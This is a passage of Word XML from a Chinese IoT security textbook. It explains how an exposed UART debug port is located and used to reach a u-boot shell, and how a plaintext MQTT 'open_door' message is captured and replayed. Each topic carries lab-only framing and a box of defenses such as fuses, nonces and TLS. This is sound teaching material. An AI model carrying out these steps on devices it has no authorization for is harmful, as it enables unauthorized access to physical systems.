        </w:rPr>
        <w:t xml:space="preserve">焊盘就像那个被壁纸遮住的侧门，攻击者用万用表测出电压跳变，就能把它“推开”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术机理与连接方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UART（Universal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Asynchronous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Receiver/Transmitter，通用异步收发器）是一种串行通信协议，仅需三根线：发送（TX）、接收（RX）和地（GND），不需要复杂的时钟线，靠双方约定相同波特率（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">115200）来同步。设备启动时，Bootloader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和内核会通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出详细日志，部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在启动时允许按下键盘任意键中断自动启动，直接进入交互式控制台。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">通用实验步骤（仅限授权设备）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寻找嫌疑引脚：PCB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上通常会有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个或更多一排的通孔焊盘，丝印可能标注“J1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CON3”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，或者直接就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TX/RX/VCC/GND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">四个点。首先用万用表找出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GND（与电源负或屏蔽罩导通）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VCC（恒定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5V），排除掉。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引脚：剩余的引脚通常一个为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TX，在设备启动时有数据流，万用表测电压会看到快速波动（或者用逻辑分析仪观察信号）。将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转串口模块的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与板子</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相接，模块的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依次尝试接到未知引脚，用串口助手（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">screen /dev/ttyUSB0 115200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）观察是否有可读输出。注意大多数贴片</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">电平，若使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的串口模块需加电平转换，否则可能烧毁</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接与交互：成功识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，将模块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接至板子</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TX，若设备还有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引脚，可尝试发送命令（如进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时按空格键）。如果直接得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell，则该设备无口令保护，已攻陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②实际设备的引脚排列、波特率、有无交互</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">取决于具体产品型号与固件配置，本实验已用通用开发板（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NodeMCU、ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Discovery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">板）模拟，所有观察值用占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;BAUD_RATE&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;PIN_GPIO_NUMBER&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标注。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（UART</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">调试口）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">硬件禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：量产阶段烧断调试接口的熔丝位（Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuse），或将调试引脚配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入并内部下拉，使其在物理上不可用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用引导交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bootdelay=-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或密码保护，禁止未经认证的引导中断；生产固件应设为静默启动（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console=null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">外壳防拆与防篡改检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：物理封胶、防拆开关与篡改后可自动擦除密钥的电路设计，加大攻击者接触调试口的代价。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志最低化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：内核启动参数中去掉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console=ttyS0,115200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，避免输出日志泄露内核版本、内存布局等可用于进一步攻击的信息。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="376"/>
    <w:bookmarkStart w:id="377" w:name="重放攻击当过去的指令又被执行一次"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重放攻击：当过去的指令又被执行一次</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。重放攻击（Replay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack）是指攻击者捕获一段合法通信（如开门指令、温度设置、传感器读数报告），然后在稍后时间原封不动地重新发送，以诱骗接收方执行与上次相同的操作。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景中，它多发生于无线遥控、智能家居本地通信和未启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TSL/DTLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT/CoAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息。其核心危害在于，即便通信内容已被加密，若缺乏新鲜性保证，密文块本身也可以被重放。例如，一个用固定码的无线门铃，攻击者只需用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SDR（软件定义无线电）录制一次“开锁”信号并在时机合适时重放，门即被打开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。设想你听到有人对电梯说“去五楼”，电梯应声而动。你拿录音笔录下这句话；五分钟后你对着电梯播放录音，电梯又去了一次五楼。电梯没有问“是谁？现在你是否还想去五楼？你的声纹验证过吗？”——它只验证了句子是否听得懂，却没有验证语句的新鲜性和说话人身份。IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重放漏洞的本质，正是通信接收方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅验证消息的格式正确性或可解密性，却未验证其唯一性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术机理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重放可行性的条件：（a）消息中无防重放因子（nonce、时间戳、序列号）；(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接收方没有维护已处理消息的集合或滑动窗口；(c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息的完整性保护没有绑定会话标识或上下文。已见《从位到物联》第28章关于序列号防重放的一般论述，IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议层实现往往不规范。例如，MQTT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v3.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身没有防重放机制，完全依赖下层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供；若本地网络中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文传输（端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1883），攻击者截获一条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"cmd":"open_door","token":"&lt;STATIC_TOKEN&gt;"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文，稍后重放即可再次触发开启动作。类似问题在基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Zigbee </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或低功耗蓝牙的智能设备中同样存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实验单元（授权自有环境）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：搭建一个不启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试环境（如使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mosquitto broker + ESP8266 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">订阅者），用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓取一条发布消息，随后使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mosquitto_pub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具将相同的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新发布到相同主题。观察订阅者是否重复执行指令。③此演示仅用于教学，使用自己编写的测试脚本，不连接真实设备。防御措施在后续框内给出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（重放攻击）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">嵌入新鲜性因子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每条指令携带单调递增的序列号、时间戳或随机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nonce，接收方维护最近有效序列号窗口，拒绝过旧或重复的消息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">挑战-应答（Challenge-Response）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于关键操作（如开门），接收方先发送随机数挑战，发送方使用共享密钥对其签名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后回应。这要求每次交互新鲜且不被伪造。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TLS/DTLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在传输层启用支持防重放的加密协议。TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置序列号和保护，能有效阻断密文重放。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">消息认证与绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：即使加密，MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算应包含信道标识、源/目的身份和新鲜性信息，保证消息无法跨会话重放。交叉参考</w:t>
